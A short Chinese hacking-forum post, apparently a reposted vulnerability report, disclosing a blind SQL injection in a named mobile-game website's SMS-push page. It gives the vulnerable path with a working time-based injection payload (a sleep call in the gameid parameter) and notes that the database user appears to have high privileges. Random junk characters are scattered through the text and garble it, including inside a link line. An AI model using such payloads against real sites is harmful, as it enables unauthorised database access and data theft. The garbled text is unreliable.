中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
: `% s- D! V5 Q1 ^$ T% G凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。1 d( d' g+ O0 g% u8 z  i
) o" ]  e% x, K9 R* W# @& x- \4 }
详细说明:5 p& F9 [# n* o6 l' F2 F7 E) H9 ]
存在SQL盲注url:" ?. f9 r, |6 n& {, b
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1( b. x3 A! C& B1 q7 W
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png4 E7 |5 K7 d2 f% Q
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
# Q3 @* W% ]  zhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
# t0 [3 [, G! L3 m% E* W. b5 l. I+ \3 @# j

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2